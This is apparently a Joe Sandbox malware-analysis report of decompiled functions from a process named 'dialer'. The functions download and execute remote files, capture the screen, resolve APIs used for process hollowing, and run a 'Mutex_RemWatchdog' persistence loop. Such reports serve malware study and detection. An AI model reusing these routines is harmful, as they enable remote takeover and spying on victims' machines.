Part of subcall function 00440972: GetLastError.KERNEL32(00000000,?,00434E55,?,?,?,00439275,?,00428772,00000000,?,00000000,?,?,00428772), ref: 00440976
Part of subcall function 00440972: _free.LIBCMT ref: 004409A9
Part of subcall function 00440972: SetLastError.KERNEL32(00000000,00439275,?,00428772,00000000,?,00000000,?,?,00428772), ref: 004409EA
Part of subcall function 00440972: _abort.LIBCMT ref: 004409F0

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0043CF59,?,?,?,?,0043C9B0,?,00000004), ref: 00448BEA
_wcschr.LIBVCRUNTIME ref: 00448C7A
_wcschr.LIBVCRUNTIME ref: 00448C88
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,0043CF59,00000000,0043D079), ref: 00448D2B

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID:
API String ID: 4212172061-0
Opcode ID: fcc8ff47617c380b615750146e971479dfa6c133a553b50efa7d834db084aed6
Instruction ID: cf2da0549e4db51aaa23bca242118811c6e9209f0f71270c7d398e1bda1e3d5b
Opcode Fuzzy Hash: fcc8ff47617c380b615750146e971479dfa6c133a553b50efa7d834db084aed6
Instruction Fuzzy Hash: 4261E771601606AAF724AF76DC82ABF73A8EF04704F14046FFA05D7681EF78E9418769

Uniqueness

Uniqueness Score: -1.00%

Function 00405C3E, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00405C3E(short* __edx, void* __eflags, intOrPtr _a4, char _a8) {
				char _v28;
				char _v44;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v84;
				void* _v104;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t33;
				void* _t50;
				signed char _t54;
				intOrPtr* _t57;
				void* _t59;
				void* _t63;
				void* _t70;
				void* _t72;
				void* _t77;
				intOrPtr* _t79;
				void* _t81;
				void* _t83;
				void* _t84;
				void* _t86;
				void* _t88;
				void* _t106;
				void* _t120;
				void* _t144;
				void* _t148;
				signed int _t155;
				void* _t158;
				void* _t159;
				void* _t160;
				void* _t162;
				void* _t166;
				void* _t167;

				_t167 = __eflags;
				_t140 = __edx;
				_t33 = L00401F75( &_a8);
				_push(0xffffffff);
				_t88 = 4;
				_push(_t88);
				_push( &_v28);
				E00404286( &_a8);
				_t158 = (_t155 & 0xfffffff8) - 0x2c;
				E004020CC(_t88, _t158, __edx, _t167, 0x46c238);
				_t159 = _t158 - 0x18;
				E004020CC(_t88, _t159, __edx, _t167,  &_v44);
				E00416DD0( &_v84, _t140);
				_t160 = _t159 + 0x30;
				_t148 =  *_t33 - _t88;
				if(_t148 == 0) {
					_t144 = 0;
					L00401E29( &_v64, _t140, __eflags, 0);
					_t141 = "F";
					__eflags = E00405A22("F");
					if(__eflags == 0) {
						L00401E29( &_v68, "F", __eflags, 0);
						_t140 = "M";
						__eflags = E00405A22("M");
						if(__eflags == 0) {
							L23:
							L00401E54( &_v64, _t140);
							L00401FA7();
							L00401FA7();
							return 0;
						}
						_v68 = 0;
						_t50 = L00401F75(L00401E29( &_v64, "M", __eflags, _t88));
						_t140 =  &_v76;
						__eflags = E00416A69(_t50,  &_v76,  &_v68);
						if(__eflags == 0) {
							_t106 = _t160 - 0x18;
							_push("2");
							L22:
							E00402064(_t88, _t106);
							_push(0xb3);
							E00404A6E(_t88, _a4, _t140, __eflags);
							goto L23;
						}
						_t140 = _v72;
						_t54 = E00413CCA(0x46bb08);
						L00438E01(_v72);
						_t162 = _t160 - 0x18;
						__eflags = (_t54 & 0x000000ff) - 1;
						L9:
						_t106 = _t162;
						if(__eflags != 0) {
							_push("3");
						} else {
							_push("1");
						}
						goto L22;
					}
					_t57 = L00401F75(L00401E29( &_v68, "F", __eflags, 2));
					_t59 = L00401F75(L00401E29( &_v68, _t141, __eflags, 3));
					_t140 =  *_t57;
					E004179B3( &_v60,  *_t57, _t59);
					_t63 = L00401F75(L00401E29( &_v72,  *_t57, __eflags, _t88));
					__imp__URLDownloadToFileW(0, _t63, L00401ECB( &_v60), 0, 0);
					__eflags = _t63;
					if(__eflags == 0) {
						L4:
						if( *((char*)(L00401F75(L00401E29( &_v84, _t140, _t171, 1)))) == 0) {
							_t120 = _t160 - 0x18;
							_push("0");
						} else {
							_t70 = ShellExecuteW(_t144, L"open", L00401ECB( &_v72), _t144, _t144, 1);
							_t120 = _t160 - 0x18;
							_t173 = _t70 - 0x20;
							if(_t70 > 0x20) {
								_push("1");
							} else {
								_push("3");
							}
						}
						L17:
						E00402064(_t88, _t120);
						_push(0xb3);
						E00404A6E(_t88, _a4, _t140, _t173);
						L00401ED0();
						goto L23;
					}
					L14:
					_t120 = _t160 - 0x18;
					_push("2");
					goto L17;
				}
				_t169 = _t148 != 1;
				if(_t148 != 1) {
					goto L23;
				}
				_t144 = 0;
				L00401E29( &_v64, _t140, _t169, 0);
				_t142 = "F";
				_t72 = E00405A22("F");
				_t170 = _t72;
				if(_t72 == 0) {
					L00401E29( &_v68, "F", __eflags, 0);
					_t140 = "M";
					__eflags = E00405A22("M");
					if(__eflags == 0) {
						goto L23;
					} else {
						_t140 = L00401F75(L00401E29( &_v64, "M", __eflags, _t88));
						_t77 = E00413CCA(0x46bb08);
						_t162 = _t160 - 0x18;
						__eflags = _t77 - 1;
						goto L9;
					}
				}
				_t79 = L00401F75(L00401E29( &_v68, "F", _t170, 2));
				_t81 = L00401F75(L00401E29( &_v68, _t142, _t170, 3));
				_t140 =  *_t79;
				E004179B3( &_v60,  *_t79, _t81);
				_t83 = L00401ECB( &_v60);
				_t84 = L00401E29( &_v72,  *_t79, _t170, _t88);
				_t166 = _t160 - 0x18;
				E004020CC(_t88, _t166, _t140, _t170, _t84);
				_t86 = E004173A6(_t83);
				_t160 = _t166 + 0x18;
				_t171 = _t86 - 1;
				if(_t86 != 1) {
					goto L14;
				}
				goto L4;
			}

0x00405c3e
0x00405c3e
0x00405c4d
0x00405c52
0x00405c56
0x00405c5c
0x00405c61
0x00405c62
0x00405c67
0x00405c71
0x00405c76
0x00405c80
0x00405c89
0x00405c8e
0x00405c91
0x00405c93
0x00405dc8
0x00405dcf
0x00405dd4
0x00405de4
0x00405de6
0x00405e86
0x00405e8b
0x00405e97
0x00405e99
0x00405f07
0x00405f0b
0x00405f14
0x00405f1c
0x00405f29
0x00405f29
0x00405e9f
0x00405eb0
0x00405eb5
0x00405ec1
0x00405ec3
0x00405eee
0x00405ef0
0x00405ef5
0x00405ef5
0x00405efd
0x00405f02
0x00000000
0x00405f02
0x00405ec5
0x00405ece
0x00405eda
0x00405ee0
0x00405ee3
0x00405db0
0x00405db0
0x00405db2
0x00405dbe
0x00405db4
0x00405db4
0x00405db4
0x00000000
0x00405db2
0x00405df5
0x00405e09
0x00405e0e
0x00405e15
0x00405e33
0x00405e3a
0x00405e40
0x00405e42
0x00405d27
0x00405d3c
0x00405e5e
0x00405e60
0x00405d42
0x00405d56
0x00405d5f
0x00405d61
0x00405d64
0x00405e54
0x00405d6a
0x00405d6a
0x00405d6a
0x00405d64
0x00405e65
0x00405e65
0x00405e6d
0x00405e72
0x00405e7b
0x00000000
0x00405e7b
0x00405e48
0x00405e4b
0x00405e4d
0x00000000
0x00405e4d
0x00405c99
0x00405c9c
0x00000000
0x00000000
0x00405ca2
0x00405ca9
0x00405cae
0x00405cb5
0x00405cbe
0x00405cc0
0x00405d75
0x00405d7a
0x00405d86
0x00405d88
0x00000000
0x00405d8e
0x00405d9f
0x00405da6
0x00405dab
0x00405dae
0x00000000
0x00405dae
0x00405d88
0x00405ccf
0x00405ce3
0x00405ce8
0x00405cef
0x00405cf9
0x00405d05
0x00405d0a
0x00405d10
0x00405d17
0x00405d1c
0x00405d1f
0x00405d21
0x00000000
0x00000000
0x00000000

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00405D56
URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00405E3A

Strings

open, xrefs: 00405D50

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: DownloadExecuteFileShell
String ID: open
API String ID: 2825088817-2758837156
Opcode ID: 0da86e01ebd0930827c120a0cad9ad274d12a472d02edefd2bdf449180da17b6
Instruction ID: fe09447a5499707a6540796bee4e3b900a4a4ee50dba93aa6f3b3a334ec0c161
Opcode Fuzzy Hash: 0da86e01ebd0930827c120a0cad9ad274d12a472d02edefd2bdf449180da17b6
Instruction Fuzzy Hash: FF61B57160430166CA04FB76D86697F37699B91748F40053FF942771E2EE3C9A098A9F

Uniqueness

Uniqueness Score: -1.00%

Function 00441069, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0043C9B0,?,00000004), ref: 004410BC

Strings

GetLocaleInfoEx, xrefs: 00441084
@, xrefs: 004410A7

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx$@
API String ID: 2299586839-3007343520
Opcode ID: e28a724808ccbae7fec18c7bc115137aef7f827691145524245741caf7b7c823
Instruction ID: a7f704755b5d2e67fe8756e3b063992e3f12ebeeb1607a3b83353fcb2a10ec15
Opcode Fuzzy Hash: e28a724808ccbae7fec18c7bc115137aef7f827691145524245741caf7b7c823
Instruction Fuzzy Hash: ADF02B31700208FBDB116F61DC02F6F7B60EF44B01F50412AFC05272A2DB798D649A9E

Uniqueness

Uniqueness Score: -1.00%

Function 0040D072, Relevance: 82.3, APIs: 28, Strings: 19, Instructions: 98
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D072() {
				_Unknown_base(*)()* _t2;
				_Unknown_base(*)()* _t24;

				_t2 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExA");
				 *0x46bd2c = _t2;
				if(_t2 == 0) {
					 *0x46bd2c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
				}
				 *0x46bd20 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
				if( *0x46bd2c == 0) {
					 *0x46bd20 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
				}
				 *0x46bd28 = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
				 *0x46bd14 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
				 *0x46beac = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				 *0x46beb0 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
				 *0x46bd24 = GetProcAddress(GetModuleHandleA("Shell32"), "IsUserAnAdmin");
				 *0x46bd18 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
				 *0x46bd30 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
				 *0x46bd34 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
				 *0x46bd1c = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
				_t24 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
				 *0x46bd10 = _t24;
				return _t24;
			}

0x0040d08e
0x0040d096
0x0040d09d
0x0040d0ae
0x0040d0ae
0x0040d0c9
0x0040d0ce
0x0040d0df
0x0040d0df
0x0040d0fd
0x0040d111
0x0040d125
0x0040d139
0x0040d14d
0x0040d161
0x0040d175
0x0040d189
0x0040d19a
0x0040d1a2
0x0040d1a6
0x0040d1ac

APIs

LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,00000000,0046C548,00000001,0040C86E), ref: 0040D085
GetProcAddress.KERNEL32(00000000), ref: 0040D08E
GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA), ref: 0040D0A9
GetProcAddress.KERNEL32(00000000), ref: 0040D0AC
LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW), ref: 0040D0BD
GetProcAddress.KERNEL32(00000000), ref: 0040D0C0
GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW), ref: 0040D0DA
GetProcAddress.KERNEL32(00000000), ref: 0040D0DD
GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 0040D0EE
GetProcAddress.KERNEL32(00000000), ref: 0040D0F1
LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 0040D102
GetProcAddress.KERNEL32(00000000), ref: 0040D105
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040D116
GetProcAddress.KERNEL32(00000000), ref: 0040D119
GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW), ref: 0040D12A
GetProcAddress.KERNEL32(00000000), ref: 0040D12D
GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin), ref: 0040D13E
GetProcAddress.KERNEL32(00000000), ref: 0040D141
GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy), ref: 0040D152
GetProcAddress.KERNEL32(00000000), ref: 0040D155
GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW), ref: 0040D166
GetProcAddress.KERNEL32(00000000), ref: 0040D169
GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors), ref: 0040D17A
GetProcAddress.KERNEL32(00000000), ref: 0040D17D
GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW), ref: 0040D18E
GetProcAddress.KERNEL32(00000000), ref: 0040D191
LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 0040D19F
GetProcAddress.KERNEL32(00000000), ref: 0040D1A2

Strings

GetMonitorInfoW, xrefs: 0040D17F
EnumDisplayMonitors, xrefs: 0040D16B
GetComputerNameExW, xrefs: 0040D11B
SetProcessDEPPolicy, xrefs: 0040D143
NtUnmapViewOfSection, xrefs: 0040D0E4
Psapi.dll, xrefs: 0040D080, 0040D0B8
GetModuleFileNameExA, xrefs: 0040D07B, 0040D09F
kernel32.dll, xrefs: 0040D0F8
ntdll.dll, xrefs: 0040D0E9
Shell32, xrefs: 0040D134
Shlwapi.dll, xrefs: 0040D195
GetModuleFileNameExW, xrefs: 0040D0B3, 0040D0D0
user32, xrefs: 0040D15C, 0040D170, 0040D184
GlobalMemoryStatusEx, xrefs: 0040D0F3
kernel32, xrefs: 0040D10C, 0040D120, 0040D148
Kernel32.dll, xrefs: 0040D0A4, 0040D0D5
EnumDisplayDevicesW, xrefs: 0040D157
IsUserAnAdmin, xrefs: 0040D12F
IsWow64Process, xrefs: 0040D107

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule$LibraryLoad
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$user32
API String ID: 551388010-3474354060
Opcode ID: ee77730f3c10e163074c29ba8ff803cc8afef09899e29833192295e4fdf7bb44
Instruction ID: 029b01f258c961e34356c9f3640987a8bc8548ac7ec401a199099fba32c80220
Opcode Fuzzy Hash: ee77730f3c10e163074c29ba8ff803cc8afef09899e29833192295e4fdf7bb44
Instruction Fuzzy Hash: 10218EA0E8035875DA20BBB66C4DE1B2E58DA84B957214C27F205D7191FBFCC5408FAF

Uniqueness

Uniqueness Score: -1.00%

Function 004142A5, Relevance: 51.0, APIs: 27, Strings: 2, Instructions: 298
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E004142A5(void* __ecx, char __edx, void* __eflags, signed int _a4) {
				void* _v12;
				char _v13;
				struct HDC__* _v20;
				signed int _v24;
				signed int _v28;
				int _v32;
				int _v36;
				struct HDC__* _v40;
				void* _v46;
				intOrPtr _v50;
				intOrPtr _v54;
				char _v56;
				char _v80;
				intOrPtr _v84;
				struct tagCURSORINFO _v100;
				signed int _v106;
				signed int _v108;
				long _v116;
				long _v120;
				char _v124;
				struct _ICONINFO _v144;
				char _v168;
				void* __ebx;
				int _t114;
				void* _t115;
				void* _t116;
				void* _t120;
				int _t127;
				void* _t128;
				signed char _t140;
				long _t146;
				void* _t147;
				int _t149;
				void* _t157;
				void* _t186;
				void* _t188;
				void* _t194;
				int _t199;
				void* _t204;
				void* _t223;
				signed int _t226;
				struct HDC__* _t228;
				struct HDC__* _t232;
				struct tagBITMAPINFO* _t234;
				void* _t235;
				int _t241;

				_v13 = __edx;
				_t194 = __ecx;
				_t232 = CreateDCA("DISPLAY", 0, 0, 0);
				_v20 = _t232;
				_t228 = CreateCompatibleDC(_t232);
				_v40 = _t228;
				_v32 = E004146DC( *((intOrPtr*)(0x46bd78 + _a4 * 4)));
				_t114 = E00414728( *((intOrPtr*)(0x46bd78 + _a4 * 4)));
				_t199 = _v32;
				_v36 = _t114;
				if(_t199 != 0 || _t114 != 0) {
					_t115 = CreateCompatibleBitmap(_t232, _t199, _t114);
					_v12 = _t115;
					__eflags = _t115;
					if(_t115 != 0) {
						_t116 = SelectObject(_t228, _t115);
						__eflags = _t116;
						if(_t116 != 0) {
							_v28 = _v28 & 0x00000000;
							_v24 = _v24 & 0x00000000;
							E00414769( *((intOrPtr*)(0x46bd78 + _a4 * 4)),  &_v28);
							_t120 = StretchBlt(_t228, 0, 0, _v32, _v36, _t232, _v28, _v24, _v32, _v36, 0xcc0020);
							__eflags = _t120;
							if(_t120 == 0) {
								goto L7;
							}
							__eflags = _v13;
							if(_v13 != 0) {
								_v100.cbSize = 0x14;
								_t186 = GetCursorInfo( &_v100);
								__eflags = _t186;
								if(_t186 != 0) {
									_t188 = GetIconInfo(_v100.hCursor,  &_v144);
									__eflags = _t188;
									if(_t188 != 0) {
										_t241 = _v84 - _v144.yHotspot - _v24;
										__eflags = _t241;
										DeleteObject(_v144.hbmColor);
										DeleteObject(_v144.hbmMask);
										_t228 = _v40;
										DrawIcon(_t228, _v100.ptScreenPos - _v144.xHotspot - _v28, _t241, _v100.hCursor);
										_t232 = _v20;
									}
								}
							}
							_push( &_v124);
							_t127 = 0x18;
							_t128 = GetObjectA(_v12, _t127, ??);
							__eflags = _t128;
							if(_t128 == 0) {
								goto L7;
							} else {
								_t226 = _v106 * _v108 & 0x0000ffff;
								__eflags = _t226 - 1;
								if(_t226 != 1) {
									_push(4);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										L24:
										__eflags = 1 << 1;
										_push(0x2eb6edc);
										L25:
										_t234 = LocalAlloc(0x40, ??);
										_t204 = 0x18;
										_t234->bmiHeader = 0x28;
										_t234->bmiHeader.biWidth = _v120;
										_t234->bmiHeader.biHeight = _v116;
										_t234->bmiHeader.biPlanes = _v108;
										_t234->bmiHeader.biBitCount = _v106;
										_t140 = _a4;
										__eflags = _t140 - _t204;
										if(_t140 < _t204) {
											__eflags = 1;
											_t234->bmiHeader.biClrUsed = 1 << _t140;
										}
										_t234->bmiHeader.biCompression = _t234->bmiHeader.biCompression & 0x00000000;
										_t234->bmiHeader.biClrImportant = _t234->bmiHeader.biClrImportant & 0x00000000;
										asm("cdq");
										_t227 = _t226 & 0x00000007;
										_t146 = (_t234->bmiHeader.biWidth + 7 + (_t226 & 0x00000007) >> 3) * (_a4 & 0x0000ffff) * _t234->bmiHeader.biHeight;
										_t234->bmiHeader.biSizeImage = _t146;
										_t147 = GlobalAlloc(0, _t146);
										_a4 = _t147;
										__eflags = _t147;
										if(_t147 != 0) {
											_t149 = GetDIBits(_t228, _v12, 0, _t234->bmiHeader.biHeight & 0x0000ffff, _t147, _t234, 0);
											__eflags = _t149;
											if(_t149 != 0) {
												_v56 = 0x4d42;
												_v54 = _t234->bmiHeader + _t234->bmiHeader.biSizeImage + _t234->bmiHeader.biClrUsed * 4 + 0xe;
												_v50 = 0;
												_t157 = _t234->bmiHeader + _t234->bmiHeader.biClrUsed * 4 + 0xe;
												__eflags = _t157;
												_v46 = _t157;
												E004020B5(_t194,  &_v80);
												E004020B5(_t194,  &_v168);
												E004024FD(_t194,  &_v80, _t227, __eflags,  &_v56, 0xe);
												E00403416( &_v80);
												E004024FD(_t194,  &_v80, _t227, __eflags, _t234, 0x28);
												E00403416( &_v80);
												_t235 = _a4;
												E004024FD(_t194,  &_v80, _t227, __eflags, _t235, _t234->bmiHeader.biSizeImage);
												E00403416( &_v80);
												DeleteObject(_v12);
												GlobalFree(_t235);
												DeleteDC(_v20);
												DeleteDC(_t228);
												E00402024(_t194, _t194, __eflags,  &_v168);
												L00401FA7();
												L00401FA7();
												goto L32;
											}
											DeleteDC(_v20);
											DeleteDC(_t228);
											DeleteObject(_v12);
											GlobalFree(_a4);
											goto L2;
										} else {
											_push(_v20);
											L8:
											DeleteDC();
											DeleteDC(_t228);
											_push(_v12);
											goto L5;
										}
									}
									_push(8);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										goto L24;
									}
									_push(0x10);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										goto L24;
									}
									_t223 = 0x18;
									__eflags = _t226 - _t223;
									if(_t226 > _t223) {
										_push(0x20);
										_pop(1);
										L23:
										_a4 = 1;
										goto L24;
									}
									_a4 = _t223;
									_push(0x28);
									goto L25;
								}
								goto L23;
							}
						}
						L7:
						_push(_t232);
						goto L8;
					} else {
						DeleteDC(_t232);
						DeleteDC(_t228);
						_push(0);
						L5:
						DeleteObject();
						goto L2;
					}
				} else {
					L2:
					E00402064(_t194, _t194, 0x45f6ac);
					L32:
					return _t194;
				}
			}

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004142C0
CreateCompatibleDC.GDI32(00000000), ref: 004142CC
CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0041431A
DeleteDC.GDI32(00000000), ref: 0041432E
DeleteDC.GDI32(00000000), ref: 00414331
DeleteObject.GDI32(?), ref: 00414335
SelectObject.GDI32(00000000,00000000), ref: 0041433F
DeleteDC.GDI32(00000000), ref: 00414350
DeleteDC.GDI32(00000000), ref: 00414353
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041438F
GetCursorInfo.USER32(?,?,?), ref: 004143AA
GetIconInfo.USER32(?,?), ref: 004143BE
DeleteObject.GDI32(?), ref: 004143E3
DeleteObject.GDI32(?), ref: 004143EC
DrawIcon.USER32 ref: 004143FB
GetObjectA.GDI32(?,00000018,?), ref: 0041440F
LocalAlloc.KERNEL32(00000040,00000001,?,?), ref: 00414475
GlobalAlloc.KERNEL32(00000000,?,?,?), ref: 004144DE
GetDIBits.GDI32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 00414502
DeleteDC.GDI32(?), ref: 00414515
DeleteDC.GDI32(00000000), ref: 00414518
DeleteObject.GDI32(?), ref: 0041451D
GlobalFree.KERNEL32 ref: 00414527
DeleteObject.GDI32(?), ref: 004145CC
GlobalFree.KERNEL32 ref: 004145D3
DeleteDC.GDI32(?), ref: 004145E2
DeleteDC.GDI32(00000000), ref: 004145E5

Strings

DISPLAY, xrefs: 004142B9
d?A, xrefs: 00414381, 004143E0

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDrawLocalSelectStretch
String ID: DISPLAY$d?A
API String ID: 860969378-979833423
Opcode ID: 473d270f5943e72469e1eb6f635e34cfdefb73a496e44f2443727fb2ad1c5628
Instruction ID: 5f48c5219878f18165c8a10fe86ed1b3fa979366dd0a80e665ef025d0f654af7
Opcode Fuzzy Hash: 473d270f5943e72469e1eb6f635e34cfdefb73a496e44f2443727fb2ad1c5628
Instruction Fuzzy Hash: 1AB18075A00319AFDB10DFA0DC45BEEBBB8EF44752F00402AF945E7291DB74AA85CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040F785, Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 181
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040F785() {
				long _v8;
				char _v32;
				short _v556;
				short _v1076;
				short _v1596;
				short _v2116;
				void* _t27;
				void* _t28;
				void* _t31;
				long _t37;
				int _t41;
				long _t50;
				void* _t55;
				void* _t68;
				void* _t70;
				int _t71;
				void* _t72;
				long _t73;
				void* _t110;
				void* _t112;
				void* _t115;
				void* _t116;

				_t71 = 0;
				_v8 = _t73;
				CreateMutexA(0, 1, "Mutex_RemWatchdog");
				GetModuleFileNameW(0,  &_v2116, 0x104);
				_t27 = E00402469();
				_t28 = L00401F75(0x46c560);
				_t108 = 0x46c518;
				_t31 = E00410420(L00401F75(0x46c518), "exepath",  &_v556, 0x208, _t28, _t27);
				_t116 = _t115 + 0x14;
				if(_t31 != 0) {
					E004020B5(0,  &_v32);
					if(E00417334( &_v556,  &_v32) == 0) {
						goto L1;
					}
					_t110 = OpenProcess(0x100000, 0, _v8);
					WaitForSingleObject(_t110, 0xffffffff);
					CloseHandle(_t110);
					_t37 = GetCurrentProcessId();
					if(E004105A0(0x46c518, L00401F75(0x46c518), "WDH", _t37) == 0) {
						L18:
						_push(1);
						L2:
						ExitProcess();
					}
					_t108 = ShellExecuteW;
					do {
						_t41 = PathFileExistsW( &_v556);
						_t42 =  &_v556;
						if(_t41 != 0) {
							L11:
							ShellExecuteW(_t71, L"open", _t42, _t71, _t71, 1);
							L12:
							do {
								_t72 = E00410275(L00401F75(0x46c518), "WD",  &_v8);
								_t122 = _t72;
								if(_t72 == 0) {
									Sleep(0x1f4);
								} else {
									E004106D2(L00401F75(0x46c518), _t122, "WD");
								}
							} while (_t72 == 0);
							goto L17;
						}
						_t55 = E00402469();
						if(E0041729F(L00401F75( &_v32), _t55,  &_v556, _t71) == 0) {
							E00431810(_t108,  &_v1596, _t71, 0x208);
							_t116 = _t116 + 0xc;
							GetTempPathW(0x104,  &_v1596);
							GetTempFileNameW( &_v1596, L"temp_", _t71,  &_v1076);
							lstrcatW( &_v1076, L".exe");
							_t68 = E00402469();
							_t70 = E0041729F(L00401F75( &_v32), _t68,  &_v1076, _t71);
							__eflags = _t70;
							if(_t70 == 0) {
								goto L12;
							}
							_t42 =  &_v1076;
							goto L11;
						}
						_t42 =  &_v556;
						goto L11;
						L17:
						_t71 = 0;
						_t112 = OpenProcess(0x100000, 0, _v8);
						WaitForSingleObject(_t112, 0xffffffff);
						CloseHandle(_t112);
						_t50 = GetCurrentProcessId();
					} while (E004105A0(0x46c518, L00401F75(0x46c518), "WDH", _t50) != 0);
					goto L18;
				}
				L1:
				_push(_t71);
				goto L2;
			}

APIs

CreateMutexA.KERNEL32(00000000,00000001,Mutex_RemWatchdog,0046C578,0046C518,00000000), ref: 0040F79E
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040F7B1

Part of subcall function 00410420: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 0041043C
Part of subcall function 00410420: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 00410455
Part of subcall function 00410420: RegCloseKey.ADVAPI32(00000000), ref: 00410460

ExitProcess.KERNEL32 ref: 0040F7F8
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 0040F821
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040F82C
CloseHandle.KERNEL32(00000000), ref: 0040F833
GetCurrentProcessId.KERNEL32 ref: 0040F839
PathFileExistsW.SHLWAPI(?), ref: 0040F86A
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0040F939
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 0040F98F
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040F99A
CloseHandle.KERNEL32(00000000), ref: 0040F9A1
GetCurrentProcessId.KERNEL32 ref: 0040F9A7

Strings

temp_, xrefs: 0040F8DB
.exe, xrefs: 0040F8ED
WDH, xrefs: 0040F840, 0040F9AE
exepath, xrefs: 0040F7DD
open, xrefs: 0040F933
Mutex_RemWatchdog, xrefs: 0040F791

Memory Dump Source

